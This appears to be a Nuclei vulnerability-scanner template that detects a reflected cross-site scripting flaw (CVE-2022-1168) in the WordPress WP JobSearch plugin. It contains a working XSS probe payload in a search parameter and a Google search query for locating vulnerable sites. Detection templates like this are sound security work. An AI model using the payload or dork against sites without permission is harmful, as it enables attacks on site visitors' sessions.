nuclei-templates/http/cves/2022/CVE-2022-1168.yaml

52 lines
1.7 KiB
YAML
Raw Normal View History

2023-01-20 14:17:33 +00:00
id: CVE-2022-1168
info:
name: WordPress WP JobSearch <1.5.1 - Cross-Site Scripting
2023-01-20 14:17:33 +00:00
author: Akincibor
severity: medium
description: |
WordPress WP JobSearch plugin prior to 1.5.1 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
2023-01-20 14:17:33 +00:00
reference:
- https://wpscan.com/vulnerability/bcf38e87-011e-4540-8bfb-c93443a4a490
- https://codecanyon.net/item/jobsearch-wp-job-board-wordpress-plugin/21066856
- https://nvd.nist.gov/vuln/detail/CVE-2022-1168
2023-01-20 14:17:33 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
2023-01-20 14:17:33 +00:00
cve-id: CVE-2022-1168
cwe-id: CWE-79
2023-07-11 19:49:27 +00:00
epss-score: 0.00112
cpe: cpe:2.3:a:eyecix:jobsearch_wp_job_board:*:*:*:*:*:wordpress:*:*
2023-08-31 11:46:18 +00:00
epss-percentile: 0.43971
2023-01-20 14:17:33 +00:00
metadata:
max-request: 1
google-query: inurl:"wp-content/plugins/wp-jobsearch"
2023-06-04 08:13:42 +00:00
verified: true
2023-07-11 19:49:27 +00:00
framework: wordpress
vendor: eyecix
product: jobsearch_wp_job_board
tags: wp-jobsearch",wpscan,cve,cve2022,wp-plugin,wp,wordpress,xss
2023-01-20 14:17:33 +00:00
http:
2023-01-20 14:17:33 +00:00
- method: GET
path:
- '{{BaseURL}}/plugins/jobsearch/?search_title=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28domain%29%3E&ajax_filter=true&posted=all&sort-by=recent'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<img src=x onerror=alert(domain)>"
2023-01-21 09:34:54 +00:00
- "wp-jobsearch"
condition: and
2023-01-20 14:17:33 +00:00
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 404